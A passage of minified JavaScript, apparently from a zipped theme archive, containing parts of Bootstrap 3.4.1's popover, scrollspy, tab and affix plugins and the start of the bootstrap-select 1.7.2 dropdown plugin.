s.DEFAULTS},s.prototype.setContent=function(){var t=this.tip(),e=this.getTitle(),i=this.getContent();if(this.options.html){var o=typeof i;this.options.sanitize&&(e=this.sanitizeHtml(e),"string"===o&&(i=this.sanitizeHtml(i))),t.find(".popover-title").html(e),t.find(".popover-content").children().detach().end()["string"===o?"html":"append"](i)}else t.find(".popover-title").text(e),t.find(".popover-content").children().detach().end().text(i);t.removeClass("fade top bottom left right in"),t.find(".popover-title").html()||t.find(".popover-title").hide()},s.prototype.hasContent=function(){return this.getTitle()||this.getContent()},s.prototype.getContent=function(){var t=this.$element,e=this.options;return t.attr("data-content")||("function"==typeof e.content?e.content.call(t[0]):e.content)},s.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".arrow")};var t=n.fn.popover;n.fn.popover=function e(o){return this.each(function(){var t=n(this),e=t.data("bs.popover"),i="object"==typeof o&&o;!e&&/destroy|hide/.test(o)||(e||t.data("bs.popover",e=new s(this,i)),"string"==typeof o&&e[o]())})},n.fn.popover.Constructor=s,n.fn.popover.noConflict=function(){return n.fn.popover=t,this}}(jQuery),function(s){"use strict";function n(t,e){this.$body=s(document.body),this.$scrollElement=s(t).is(document.body)?s(window):s(t),this.options=s.extend({},n.DEFAULTS,e),this.selector=(this.options.target||"")+" .nav li > a",this.offsets=[],this.targets=[],this.activeTarget=null,this.scrollHeight=0,this.$scrollElement.on("scroll.bs.scrollspy",s.proxy(this.process,this)),this.refresh(),this.process()}function e(o){return this.each(function(){var t=s(this),e=t.data("bs.scrollspy"),i="object"==typeof o&&o;e||t.data("bs.scrollspy",e=new n(this,i)),"string"==typeof o&&e[o]()})}n.VERSION="3.4.1",n.DEFAULTS={offset:10},n.prototype.getScrollHeight=function(){return this.$scrollElement[0].scrollHeight||Math.max(this.$body[0].scrollHeight,document.documentElement.scrollHeight)},n.prototype.refresh=function(){var t=this,o="offset",n=0;this.offsets=[],this.targets=[],this.scrollHeight=this.getScrollHeight(),s.isWindow(this.$scrollElement[0])||(o="position",n=this.$scrollElement.scrollTop()),this.$body.find(this.selector).map(function(){var t=s(this),e=t.data("target")||t.attr("href"),i=/^#./.test(e)&&s(e);return i&&i.length&&i.is(":visible")&&[[i[o]().top+n,e]]||null}).sort(function(t,e){return t[0]-e[0]}).each(function(){t.offsets.push(this[0]),t.targets.push(this[1])})},n.prototype.process=function(){var t,e=this.$scrollElement.scrollTop()+this.options.offset,i=this.getScrollHeight(),o=this.options.offset+i-this.$scrollElement.height(),n=this.offsets,s=this.targets,a=this.activeTarget;if(this.scrollHeight!=i&&this.refresh(),o<=e)return a!=(t=s[s.length-1])&&this.activate(t);if(a&&e<n[0])return this.activeTarget=null,this.clear();for(t=n.length;t--;)a!=s[t]&&e>=n[t]&&(n[t+1]===undefined||e<n[t+1])&&this.activate(s[t])},n.prototype.activate=function(t){this.activeTarget=t,this.clear();var e=this.selector+'[data-target="'+t+'"],'+this.selector+'[href="'+t+'"]',i=s(e).parents("li").addClass("active");i.parent(".dropdown-menu").length&&(i=i.closest("li.dropdown").addClass("active")),i.trigger("activate.bs.scrollspy")},n.prototype.clear=function(){s(this.selector).parentsUntil(this.options.target,".active").removeClass("active")};var t=s.fn.scrollspy;s.fn.scrollspy=e,s.fn.scrollspy.Constructor=n,s.fn.scrollspy.noConflict=function(){return s.fn.scrollspy=t,this},s(window).on("load.bs.scrollspy.data-api",function(){s('[data-spy="scroll"]').each(function(){var t=s(this);e.call(t,t.data())})})}(jQuery),function(r){"use strict";var a=function(t){this.element=r(t)};function e(i){return this.each(function(){var t=r(this),e=t.data("bs.tab");e||t.data("bs.tab",e=new a(this)),"string"==typeof i&&e[i]()})}a.VERSION="3.4.1",a.TRANSITION_DURATION=150,a.prototype.show=function(){var t=this.element,e=t.closest("ul:not(.dropdown-menu)"),i=t.data("target");if(i||(i=(i=t.attr("href"))&&i.replace(/.*(?=#[^\s]*$)/,"")),!t.parent("li").hasClass("active")){var o=e.find(".active:last a"),n=r.Event("hide.bs.tab",{relatedTarget:t[0]}),s=r.Event("show.bs.tab",{relatedTarget:o[0]});if(o.trigger(n),t.trigger(s),!s.isDefaultPrevented()&&!n.isDefaultPrevented()){var a=r(document).find(i);this.activate(t.closest("li"),e),this.activate(a,a.parent(),function(){o.trigger({type:"hidden.bs.tab",relatedTarget:t[0]}),t.trigger({type:"shown.bs.tab",relatedTarget:o[0]})})}}},a.prototype.activate=function(t,e,i){var o=e.find("> .active"),n=i&&r.support.transition&&(o.length&&o.hasClass("fade")||!!e.find("> .fade").length);function s(){o.removeClass("active").find("> .dropdown-menu > .active").removeClass("active").end().find('[data-toggle="tab"]').attr("aria-expanded",!1),t.addClass("active").find('[data-toggle="tab"]').attr("aria-expanded",!0),n?(t[0].offsetWidth,t.addClass("in")):t.removeClass("fade"),t.parent(".dropdown-menu").length&&t.closest("li.dropdown").addClass("active").end().find('[data-toggle="tab"]').attr("aria-expanded",!0),i&&i()}o.length&&n?o.one("bsTransitionEnd",s).emulateTransitionEnd(a.TRANSITION_DURATION):s(),o.removeClass("in")};var t=r.fn.tab;r.fn.tab=e,r.fn.tab.Constructor=a,r.fn.tab.noConflict=function(){return r.fn.tab=t,this};var i=function(t){t.preventDefault(),e.call(r(this),"show")};r(document).on("click.bs.tab.data-api",'[data-toggle="tab"]',i).on("click.bs.tab.data-api",'[data-toggle="pill"]',i)}(jQuery),function(l){"use strict";var h=function(t,e){this.options=l.extend({},h.DEFAULTS,e);var i=this.options.target===h.DEFAULTS.target?l(this.options.target):l(document).find(this.options.target);this.$target=i.on("scroll.bs.affix.data-api",l.proxy(this.checkPosition,this)).on("click.bs.affix.data-api",l.proxy(this.checkPositionWithEventLoop,this)),this.$element=l(t),this.affixed=null,this.unpin=null,this.pinnedOffset=null,this.checkPosition()};function i(o){return this.each(function(){var t=l(this),e=t.data("bs.affix"),i="object"==typeof o&&o;e||t.data("bs.affix",e=new h(this,i)),"string"==typeof o&&e[o]()})}h.VERSION="3.4.1",h.RESET="affix affix-top affix-bottom",h.DEFAULTS={offset:0,target:window},h.prototype.getState=function(t,e,i,o){var n=this.$target.scrollTop(),s=this.$element.offset(),a=this.$target.height();if(null!=i&&"top"==this.affixed)return n<i&&"top";if("bottom"==this.affixed)return null!=i?!(n+this.unpin<=s.top)&&"bottom":!(n+a<=t-o)&&"bottom";var r=null==this.affixed,l=r?n:s.top;return null!=i&&n<=i?"top":null!=o&&t-o<=l+(r?a:e)&&"bottom"},h.prototype.getPinnedOffset=function(){if(this.pinnedOffset)return this.pinnedOffset;this.$element.removeClass(h.RESET).addClass("affix");var t=this.$target.scrollTop(),e=this.$element.offset();return this.pinnedOffset=e.top-t},h.prototype.checkPositionWithEventLoop=function(){setTimeout(l.proxy(this.checkPosition,this),1)},h.prototype.checkPosition=function(){if(this.$element.is(":visible")){var t=this.$element.height(),e=this.options.offset,i=e.top,o=e.bottom,n=Math.max(l(document).height(),l(document.body).height());"object"!=typeof e&&(o=i=e),"function"==typeof i&&(i=e.top(this.$element)),"function"==typeof o&&(o=e.bottom(this.$element));var s=this.getState(n,t,i,o);if(this.affixed!=s){null!=this.unpin&&this.$element.css("top","");var a="affix"+(s?"-"+s:""),r=l.Event(a+".bs.affix");if(this.$element.trigger(r),r.isDefaultPrevented())return;this.affixed=s,this.unpin="bottom"==s?this.getPinnedOffset():null,this.$element.removeClass(h.RESET).addClass(a).trigger(a.replace("affix","affixed")+".bs.affix")}"bottom"==s&&this.$element.offset({top:n-t-o})}};var t=l.fn.affix;l.fn.affix=i,l.fn.affix.Constructor=h,l.fn.affix.noConflict=function(){return l.fn.affix=t,this},l(window).on("load",function(){l('[data-spy="affix"]').each(function(){var t=l(this),e=t.data();e.offset=e.offset||{},null!=e.offsetBottom&&(e.offset.bottom=e.offsetBottom),null!=e.offsetTop&&(e.offset.top=e.offsetTop),i.call(t,e)})})}(jQuery);PK!��#��s�sflex/js/bootstrap-select.jsnu&1i�!function(a){"use strict";function b(b){var c=[{re:/[\xC0-\xC6]/g,ch:"A"},{re:/[\xE0-\xE6]/g,ch:"a"},{re:/[\xC8-\xCB]/g,ch:"E"},{re:/[\xE8-\xEB]/g,ch:"e"},{re:/[\xCC-\xCF]/g,ch:"I"},{re:/[\xEC-\xEF]/g,ch:"i"},{re:/[\xD2-\xD6]/g,ch:"O"},{re:/[\xF2-\xF6]/g,ch:"o"},{re:/[\xD9-\xDC]/g,ch:"U"},{re:/[\xF9-\xFC]/g,ch:"u"},{re:/[\xC7-\xE7]/g,ch:"c"},{re:/[\xD1]/g,ch:"N"},{re:/[\xF1]/g,ch:"n"}];return a.each(c,function(){b=b.replace(this.re,this.ch)}),b}function c(a){var b={"&":"&amp;","<":"&lt;",">":"&gt;",'"':"&quot;","'":"&#x27;","`":"&#x60;"},c="(?:"+Object.keys(b).join("|")+")",d=new RegExp(c),e=new RegExp(c,"g"),f=null==a?"":""+a;return d.test(f)?f.replace(e,function(a){return b[a]}):f}function e(b,c){var e=arguments,f=b,g=c;[].shift.apply(e);var h,i=this.each(function(){var b=a(this);if(b.is("select")){var c=b.data("selectpicker"),i="object"==typeof f&&f;if(c){if(i)for(var k in i)i.hasOwnProperty(k)&&(c.options[k]=i[k])}else{var j=a.extend({},d.DEFAULTS,a.fn.selectpicker.defaults||{},b.data(),i);b.data("selectpicker",c=new d(this,j,g))}"string"==typeof f&&(h=c[f]instanceof Function?c[f].apply(c,e):c.options[f])}});return"undefined"!=typeof h?h:i}String.prototype.includes||!function(){var a={}.toString,b=function(){try{var a={},b=Object.defineProperty,c=b(a,a,a)&&b}catch(a){}return c}(),c="".indexOf,d=function(b){if(null==this)throw TypeError();var d=String(this);if(b&&"[object RegExp]"==a.call(b))throw TypeError();var e=d.length,f=String(b),g=f.length,h=arguments.length>1?arguments[1]:void 0,i=h?Number(h):0;i!=i&&(i=0);var j=Math.min(Math.max(i,0),e);return!(g+j>e)&&c.call(d,f,i)!=-1};b?b(String.prototype,"includes",{value:d,configurable:!0,writable:!0}):String.prototype.includes=d}(),String.prototype.startsWith||!function(){var a=function(){try{var a={},b=Object.defineProperty,c=b(a,a,a)&&b}catch(a){}return c}(),b={}.toString,c=function(a){if(null==this)throw TypeError();var c=String(this);if(a&&"[object RegExp]"==b.call(a))throw TypeError();var d=c.length,e=String(a),f=e.length,g=arguments.length>1?arguments[1]:void 0,h=g?Number(g):0;h!=h&&(h=0);var i=Math.min(Math.max(h,0),d);if(f+i>d)return!1;for(var j=-1;++j<f;)if(c.charCodeAt(i+j)!=e.charCodeAt(j))return!1;return!0};a?a(String.prototype,"startsWith",{value:c,configurable:!0,writable:!0}):String.prototype.startsWith=c}(),Object.keys||(Object.keys=function(a,b,c){c=[];for(b in a)c.hasOwnProperty.call(a,b)&&c.push(b);return c}),a.expr[":"].icontains=function(b,c,d){var e=a(b),f=(e.data("tokens")||e.text()).toUpperCase();return f.includes(d[3].toUpperCase())},a.expr[":"].ibegins=function(b,c,d){var e=a(b),f=(e.data("tokens")||e.text()).toUpperCase();return f.startsWith(d[3].toUpperCase())},a.expr[":"].aicontains=function(b,c,d){var e=a(b),f=(e.data("tokens")||e.data("normalizedText")||e.text()).toUpperCase();return f.includes(d[3].toUpperCase())},a.expr[":"].aibegins=function(b,c,d){var e=a(b),f=(e.data("tokens")||e.data("normalizedText")||e.text()).toUpperCase();return f.startsWith(d[3].toUpperCase())};var d=function(b,c,e){e&&(e.stopPropagation(),e.preventDefault()),this.$element=a(b),this.$newElement=null,this.$button=null,this.$menu=null,this.$lis=null,this.options=c,null===this.options.title&&(this.options.title=this.$element.attr("title")),this.val=d.prototype.val,this.render=d.prototype.render,this.refresh=d.prototype.refresh,this.setStyle=d.prototype.setStyle,this.selectAll=d.prototype.selectAll,this.deselectAll=d.prototype.deselectAll,this.destroy=d.prototype.remove,this.remove=d.prototype.remove,this.show=d.prototype.show,this.hide=d.prototype.hide,this.init()};d.VERSION="1.7.2",d.DEFAULTS={noneSelectedText:"Nothing selected",noneResultsText:"No results matched {0}",countSelectedText:function(a,b){return 1==a?"{0} item selected":"{0} items selected"},maxOptionsText:function(a,b){return[1==a?"Limit reached ({n} item max)":"Limit reached ({n} items max)",1==b?"Group limit reached ({n} item max)":"Group limit reached ({n} items max)"]},selectAllText:"Select All",deselectAllText:"Deselect All",doneButton:!1,doneButtonText:"Close",multipleSeparator:", ",styleBase:"btn",style:"btn-default",size:"auto",title:null,selectedTextFormat:"values",width:!1,container:!1,hideDisabled:!1,showSubtext:!1,showIcon:!0,showContent:!0,dropupAuto:!0,header:!1,liveSearch:!1,liveSearchPlaceholder:null,liveSearchNormalize:!1,liveSearchStyle:"contains",actionsBox:!1,iconBase:"glyphicon",tickIcon:"glyphicon-ok",maxOptions:!1,mobile:!1,selectOnTab:!1,dropdownAlignRight:!1},d.prototype={constructor:d,init:function(){var b=this,c=this.$element.attr("id");this.$element.addClass("bs-select-hidden"),this.liObj={},this.multiple=this.$element.prop("multiple"),this.autofocus=this.$element.prop("autofocus"),this.$newElement=this.createView(),this.$element.after(this.$newElement),this.$button=this.$newElement.children("button"),this.$menu=this.$newElement.children(".dropdown-menu"),this.$menuInner=this.$menu.children(".inner"),this.$searchbox=this.$menu.find("input"),this.options.dropdownAlignRight&&this.$menu.addClass("dropdown-menu-right"),"undefined"!=typeof c&&(this.$button.attr("data-id",c),a('label[for="'+c+'"]').click(function(a){a.preventDefault(),b.$button.focus()})),this.checkDisabled(),this.clickListener(),this.options.liveSearch&&this.liveSearchListener(),this.render(),this.setStyle(),this.setWidth(),this.options.container&&this.selectPosition(),this.$menu.data("this",this),this.$newElement.data("this",this),this.options.mobile&&this.mobile(),this.$newElement.on("hide.bs.dropdown",function(a){b.$element.trigger("hide.bs.select",a)}),this.$newElement.on("hidden.bs.dropdown",function(a){b.$element.trigger("hidden.bs.select",a)}),this.$newElement.on("show.bs.dropdown",function(a){b.$element.trigger("show.bs.select",a)}),this.$newElement.on("shown.bs.dropdown",function(a){b.$element.trigger("shown.bs.select",a)}),setTimeout(function(){b.$element.trigger("loaded.bs.select")})},createDropdown:function(){var b=this.multiple?" show-tick":"",d=this.$element.parent().hasClass("input-group")?" input-group-btn":"",e=this.autofocus?" autofocus":"",f=this.options.header?'<div class="popover-title"><button type="button" class="close" aria-hidden="true">&times;</button>'+this.options.header+"</div>":"",g=this.options.liveSearch?'<div class="bs-searchbox"><input type="text" class="form-control" autocomplete="off"'+(null===this.options.liveSearchPlaceholder?"":' placeholder="'+c(this.options.liveSearchPlaceholder)+'"')+"></div>":"",h=this.multiple&&this.options.actionsBox?'<div class="bs-actionsbox"><div class="btn-group btn-group-sm btn-block"><button type="button" class="actions-btn bs-select-all btn btn-default">'+this.options.selectAllText+'</button><button type="button" class="actions-btn bs-deselect-all btn btn-default">'+this.options.deselectAllText+"</button></div></div>":"",i=this.multiple&&this.options.doneButton?'<div class="bs-donebutton"><div class="btn-group btn-block"><button type="button" class="btn btn-sm btn-default">'+this.options.doneButtonText+"</button></div></div>":"",j='<div class="btn-group bootstrap-select'+b+d+'"><button type="button" class="'+this.options.styleBase+' dropdown-toggle" data-toggle="dropdown"'+e+'><span class="filter-option pull-left"></span>&nbsp;<span class="caret"></span></button><div class="dropdown-menu open">'+f+g+h+'<ul class="dropdown-menu inner" role="menu"></ul>'+i+"</div></div>";return a(j)},createView:function(){var a=this.createDropdown(),b=this.createLi();return a.find("ul")[0].innerHTML=b,a},reloadLi:function(){this.destroyLi();var a=this.createLi();this.$menuInner[0].innerHTML=a},destroyLi:function(){this.$menu.find("li").remove()},createLi:function(){var d=this,e=[],f=0,g=document.createElement("option"),h=-1,i=function(a,b,c,d){return"<li"+("undefined"!=typeof c&""!==c?' class="'+c+'"':"")+("undefined"!=typeof b&null!==b?' data-original-index="'+b+'"':"")+("undefined"!=typeof d&null!==d?'data-optgroup="'+d+'"':"")+">"+a+"</li>"},j=function(a,e,f,g){return'<a tabindex="0"'+("undefined"!=typeof e?' class="'+e+'"':"")+("undefined"!=typeof f?' style="'+f+'"':"")+(d.options.liveSearchNormalize?' data-normalized-text="'+b(c(a))+'"':"")+("undefined"!=typeof g||null!==g?' data-tokens="'+g+'"':"")+">"+a+'<span class="'+d.options.iconBase+" "+d.options.tickIcon+' check-mark"></span></a>'};if(this.options.title&&!this.multiple&&(h--,!this.$element.find(".bs-title-option").length)){var k=this.$element[0];g.className="bs-title-option",g.appendChild(document.createTextNode(this.options.title)),g.value="",k.insertBefore(g,k.firstChild),null===k.options[k.selectedIndex].getAttribute("selected")&&(g.selected=!0)}return this.$element.find("option").each(function(b){var c=a(this);if(h++,!c.hasClass("bs-title-option")){var g=this.className||"",k=this.style.cssText,l=c.data("content")?c.data("content"):c.html(),m=c.data("tokens")?c.data("tokens"):null,n="undefined"!=typeof c.data("subtext")?'<small class="text-muted">'+c.data("subtext")+"</small>":"",o="undefined"!=typeof c.data("icon")?'<span class="'+d.options.iconBase+" "+c.data("icon")+'"></span> ':"",p=this.disabled||"OPTGROUP"===this.parentElement.tagName&&this.parentElement.disabled;if(""!==o&&p&&(o="<span>"+o+"</span>"),d.options.hideDisabled&&p)return void h--;if(c.data("content")||(l=o+'<span class="text">'+l+n+"</span>"),"OPTGROUP"===this.parentElement.tagName&&c.data("divider")!==!0){if(0===c.index()){f+=1;var q=this.parentElement.label,r="undefined"!=typeof c.parent().data("subtext")?'<small class="text-muted">'+c.parent().data("subtext")+"</small>":"",s=c.parent().data("icon")?'<span class="'+d.options.iconBase+" "+c.parent().data("icon")+'"></span> ':"",t=" "+this.parentElement.className||"";q=s+'<span class="text">'+q+r+"</span>",0!==b&&e.length>0&&(h++,e.push(i("",null,"divider",f+"div"))),h++,e.push(i(q,null,"dropdown-header"+t,f))}e.push(i(j(l,"opt "+g+t,k,m),b,"",f))}else c.data("divider")===!0?e.push(i("",b,"divider")):c.data("hidden")===!0?e.push(i(j(l,g,k,m),b,"hidden is-hidden")):(this.previousElementSibling&&"OPTGROUP"===this.previousElementSibling.tagName&&(h++,e.push(i("",null,"divider",f+"div"))),e.push(i(j(l,g,k,m),b)));d.liObj[b]=h}}),this.multiple||0!==this.$element.find("option:selected").length||this.options.title||this.$element.find("option").eq(0).prop("selected",!0).attr("selected","selected"),e.join("")},findLis:function(){return null==this.$lis&&(this.$lis=this.$menu.find("li")),this.$lis},render:function(b){var d,c=this;b!==!1&&this.$element.find("option").each(function(a){var b=c.findLis().eq(c.liObj[a]);c.setDisabled(a,this.disabled||"OPTGROUP"===this.parentElement.tagName&&this.parentElement.disabled,b),c.setSelected(a,this.selected,b)}),this.tabIndex();var e=this.$element.find("option").map(function(){if(this.selected){if(c.options.hideDisabled&&(this.disabled||"OPTGROUP"===this.parentElement.tagName&&this.parentElement.disabled))return!1;var e,b=a(this),d=b.data("icon")&&c.options.showIcon?'<i class="'+c.options.iconBase+" "+b.data("icon")+'"></i> ':"";return e=c.options.showSubtext&&b.data("subtext")&&!c.multiple?' <small class="text-muted">'+b.data("subtext")+"</small>":"","undefined"!=typeof b.attr("title")?b.attr("title"):b.data("content")&&c.options.showContent?b.data("content"):d+b.html()+e}}).toArray(),f=this.multiple?e.join(this.options.multipleSeparator):e[0];if(this.multiple&&this.options.selectedTextFormat.indexOf("count")>-1){var g=this.options.selectedTextFormat.split(">");if(g.length>1&&e.length>g[1]||1==g.length&&e.length>=2){d=this.options.hideDisabled?", [disabled]":"";var h=this.$element.find("option").not('[data-divider="true"], [data-hidden="true"]'+d).length,i="function"==typeof this.options.countSelectedText?this.options.countSelectedText(e.length,h):this.options.countSelectedText;f=i.replace("{0}",e.length.toString()).replace("{1}",h.toString())}}void 0==this.options.title&&(this.options.title=this.$element.attr("title")),"static"==this.options.selectedTextFormat&&(f=this.options.title),f||(f="undefined"!=typeof this.options.title?this.options.title:this.options.noneSelectedText),this.$button.attr("title",a.trim(f.replace(/<[^>]*>?/g,""))),this.$button.children(".filter-option").html(f),this.$element.trigger("rendered.bs.select")},setStyle:function(a,b){this.$element.attr("class")&&this.$newElement.addClass(this.$element.attr("class").replace(/selectpicker|mobile-device|bs-select-hidden|validate\[.*\]/gi,""));var c=a?a:this.options.style;"add"==b?this.$button.addClass(c):"remove"==b?this.$button.removeClass(c):(this.$button.removeClass(this.options.style),this.$button.addClass(c))},liHeight:function(b){if(b||this.options.size!==!1&&!this.sizeInfo){var c=document.createElement("div"),d=document.createElement("div"),e=document.createElement("ul"),f=document.createElement("li"),g=document.createElement("li"),h=document.createElement("a"),i=document.createElement("span"),j=this.options.header?this.$menu.find(".popover-title")[0].cloneNode(!0):null,k=this.options.liveSearch?document.createElement("div"):null,l=this.options.actionsBox&&this.multiple?this.$menu.find(".bs-actionsbox")[0].cloneNode(!0):null,m=this.options.doneButton&&this.multiple?this.$menu.find(".bs-donebutton")[0].cloneNode(!0):null;if(i.className="text",c.className=this.$menu[0].parentNode.className+" open",d.className="dropdown-menu open",e.className="dropdown-menu inner",f.className="divider",i.appendChild(document.createTextNode("Inner text")),h.appendChild(i),g.appendChild(h),e.appendChild(g),e.appendChild(f),j&&d.appendChild(j),k){var n=document.createElement("span");k.className="bs-searchbox",n.className="form-control",k.appendChild(n),d.appendChild(k)}l&&d.appendChild(l),d.appendChild(e),m&&d.appendChild(m),c.appendChild(d),document.body.appendChild(c);var o=h.offsetHeight,p=j?j.offsetHeight:0,q=k?k.offsetHeight:0,r=l?l.offsetHeight:0,s=m?m.offsetHeight:0,t=a(f).outerHeight(!0),u=!!getComputedStyle&&getComputedStyle(d),v=u?a(d):null,w=parseInt(u?u.paddingTop:v.css("paddingTop"))+parseInt(u?u.paddingBottom:v.css("paddingBottom"))+parseInt(u?u.borderTopWidth:v.css("borderTopWidth"))+parseInt(u?u.borderBottomWidth:v.css("borderBottomWidth")),x=w+parseInt(u?u.marginTop:v.css("marginTop"))+parseInt(u?u.marginBottom:v.css("marginBottom"))+2;document.body.removeChild(c),this.sizeInfo={liHeight:o,headerHeight:p,searchHeight:q,actionsHeight:r,doneButtonHeight:s,dividerHeight:t,menuPadding:w,menuExtras:x}}},setSize:function(){this.findLis(),this.liHeight();var p,q,r,s,b=this,c=this.$menu,d=this.$menuInner,e=a(window),f=this.$newElement[0].offsetHeight,g=this.sizeInfo.liHeight,h=this.sizeInfo.headerHeight,i=this.sizeInfo.searchHeight,j=this.sizeInfo.actionsHeight,k=this.sizeInfo.doneButtonHeight,l=this.sizeInfo.dividerHeight,m=this.sizeInfo.menuPadding,n=this.sizeInfo.menuExtras,o=this.options.hideDisabled?".disabled":"",t=function(){r=b.$newElement.offset().top-e.scrollTop(),s=e.height()-r-f};if(t(),this.options.header&&c.css("padding-top",0),"auto"===this.options.size){var u=function(){var e,f=function(b,c){return function(d){return c?d.classList?d.classList.contains(b):a(d).hasClass(b):!(d.classList?d.classList.contains(b):a(d).hasClass(b))}},l=b.$menuInner[0].getElementsByTagName("li"),o=Array.prototype.filter?Array.prototype.filter.call(l,f("hidden",!1)):b.$lis.not(".hidden"),u=Array.prototype.filter?Array.prototype.filter.call(o,f("dropdown-header",!0)):o.filter(".dropdown-header");t(),p=s-n,b.options.container?(c.data("height")||c.data("height",c.height()),q=c.data("height")):q=c.height(),b.options.dropupAuto&&b.$newElement.toggleClass("dropup",r>s&&p-n<q),b.$newElement.hasClass("dropup")&&(p=r-n),e=o.length+u.length>3?3*g+n-2:0,c.css({"max-height":p+"px",overflow:"hidden","min-height":e+h+i+j+k+"px"}),d.css({"max-height":p-h-i-j-k-m+"px","overflow-y":"auto","min-height":Math.max(e-m,0)+"px"})};u(),this.$searchbox.off("input.getSize propertychange.getSize").on("input.getSize propertychange.getSize",u),e.off("resize.getSize scroll.getSize").on("resize.getSize scroll.getSize",u)}else if(this.options.size&&"auto"!=this.options.size&&this.$lis.not(o).length>this.options.size){var v=this.$lis.not(".divider").not(o).children().slice(0,this.options.size).last().parent().index(),w=this.$lis.slice(0,v+1).filter(".divider").length;p=g*this.options.size+w*l+m,b.options.container?(c.data("height")||c.data("height",c.height()),q=c.data("height")):q=c.height(),b.options.dropupAuto&&this.$newElement.toggleClass("dropup",r>s&&p-n<q),c.css({"max-height":p+h+i+j+k+"px",overflow:"hidden","min-height":""}),d.css({"max-height":p-m+"px","overflow-y":"auto","min-height":""})}},setWidth:function(){if("auto"===this.options.width){this.$menu.css("min-width","0");var a=this.$menu.parent().clone().appendTo("body"),b=this.options.container?this.$newElement.clone().appendTo("body"):a,c=a.children(".dropdown-menu").outerWidth(),d=b.css("width","auto").children("button").outerWidth();a.remove(),b.remove(),this.$newElement.css("width",Math.max(c,d)+"px")}else"fit"===this.options.width?(this.$menu.css("min-width",""),this.$newElement.css("width","").addClass("fit-width")):this.options.width?(this.$menu.css("min-width",""),this.$newElement.css("width",this.options.width)):(this.$menu.css("min-width",""),this.$newElement.css("width",""));this.$newElement.hasClass("fit-width")&&"fit"!==this.options.width&&this.$newElement.removeClass("fit-width")},selectPosition:function(){var e,f,b=this,c="<div />",d=a(c),g=function(a){d.addClass(a.attr("class").replace(/form-control|fit-width/gi,"")).toggleClass("dropup",a.hasClass("dropup")),e=a.offset(),f=a.hasClass("dropup")?0:a[0].offsetHeight,d.css({top:e.top+f,left:e.left,width:a[0].offsetWidth,position:"absolute"})};this.$newElement.on("click",function(){b.isDisabled()||(g(a(this)),d.appendTo(b.options.container),d.toggleClass("open",!a(this).hasClass("open")),d.append(b.$menu))}),a(window).on("resize scroll",function(){g(b.$newElement)}),this.$element.on("hide.bs.select",function(){b.$menu.data("height",b.$menu.height()),d.detach()})},setSelected:function(a,b,c){if(!c)var c=this.findLis().eq(this.liObj[a]);c.toggleClass("selected",b)},setDisabled:function(a,b,c){if(!c)var c=this.findLis().eq(this.liObj[a]);b?c.addClass("disabled").children("a").attr("href","#").attr("tabindex",-1):c.removeClass("disabled").children("a").removeAttr("href").attr("tabindex",0)},isDisabled:function(){return this.$element[0].disabled},checkDisabled:function(){var a=this;this.isDisabled()?(this.$newElement.addClass("disabled"),this.$button.addClass("disabled").attr("tabindex",-1)):(this.$button.hasClass("disabled")&&(this.$newElement.removeClass("disabled"),this.$button.removeClass("disabled")),this.$button.attr("tabindex")!=-1||this.$element.data("tabindex")||this.$button.removeAttr("tabindex")),this.$button.click(function(){return!a.isDisabled()})},tabIndex:function(){this.$element.is("[tabindex]")&&(this.$element.data("tabindex",this.$element.attr("tabindex")),this.$button.attr("tabindex",this.$element.data("tabindex")))},clickListener:function(){var b=this,c=a(document);this.$newElement.on("touchstart.dropdown",".dropdown-menu",function(a){a.stopPropagation()}),c.data("spaceSelect",!1),this.$button.on("keyup",function(a){/(32)/.test(a.keyCode.toString(10))&&c.data("spaceSelect")&&(a.preventDefault(),c.data("spaceSelect",!1))}),this.$newElement.on("click",function(){b.setSize(),b.$element.on("shown.bs.select",function(){if(b.options.liveSearch||b.multiple){if(!b.multiple){var a=b.liObj[b.$element[0].selectedIndex];if("number"!=typeof a)return;var c=b.$lis.eq(a)[0].offsetTop-b.$menuInner[0].offsetTop;c=c-b.$menuInner[0].offsetHeight/2+b.sizeInfo.liHeight/2,b.$menuInner[0].scrollTop=c}}else b.$menu.find(".selected a").focus()})}),this.$menu.on("click","li a",function(c){var d=a(this),e=d.parent().data("originalIndex"),f=b.$element.val(),g=b.$element.prop("selectedIndex");if(b.multiple&&c.stopPropagation(),c.preventDefault(),!b.isDisabled()&&!d.parent().hasClass("disabled")){var h=b.$element.find("option"),i=h.eq(e),j=i.prop("selected"),k=i.parent("optgroup"),l=b.options.maxOptions,m=k.data("maxOptions")||!1;if(b.multiple){if(i.prop("selected",!j),b.setSelected(e,!j),d.blur(),l!==!1||m!==!1){var n=l<h.filter(":selected").length,o=m<k.find("option:selected").length;if(l&&n||m&&o)if(l&&1==l)h.prop("selected",!1),i.prop("selected",!0),b.$menu.find(".selected").removeClass("selected"),b.setSelected(e,!0);else if(m&&1==m){k.find("option:selected").prop("selected",!1),i.prop("selected",!0);var p=d.parent().data("optgroup");b.$menu.find('[data-optgroup="'+p+'"]').removeClass("selected"),b.setSelected(e,!0)}else{var q="function"==typeof b.options.maxOptionsText?b.options.maxOptionsText(l,m):b.options.maxOptionsText,r=q[0].replace("{n}",l),s=q[1].replace("{n}",m),t=a('<div class="notify"></div>');q[2]&&(r=r.replace("{var}",q[2][l>1?0:1]),s=s.replace("{var}",q[2][m>1?0:1])),i.prop("selected",!1),b.$menu.append(t),l&&n&&(t.append(a("<div>"+r+"</div>")),b.$element.trigger("maxReached.bs.select")),m&&o&&(t.append(a("<div>"+s+"</div>")),b.$element.trigger("maxReachedGrp.bs.select")),setTimeout(function(){b.setSelected(e,!1)},10),t.delay(750).fadeOut(300,function(){a(this).remove()})}}}else h.prop("selected",!1),i.prop("selected",!0),b.$menu.find(".selected").removeClass("selected"),b.setSelected(e,!0);b.multiple?b.options.liveSearch&&b.$searchbox.focus():b.$button.focus(),(f!=b.$element.val()&&b.multiple||g!=b.$element.prop("selectedIndex")&&!b.multiple)&&(b.$element.change(),b.$element.trigger("changed.bs.select",[e,i.prop("selected"),j]))}}),this.$menu.on("click","li.disabled a, .popover-title, .popover-title :not(.close)",function(c){c.currentTarget==this&&(c.preventDefault(),c.stopPropagation(),b.options.liveSearch&&!a(c.target).hasClass("close")?b.$searchbox.focus():b.$button.focus())}),this.$menu.on("click","li.divider, li.dropdown-header",function(a){a.preventDefault(),a.stopPropagation(),b.options.liveSearch?b.$searchbox.focus():b.$button.focus()}),this.$menu.on("click",".popover-title 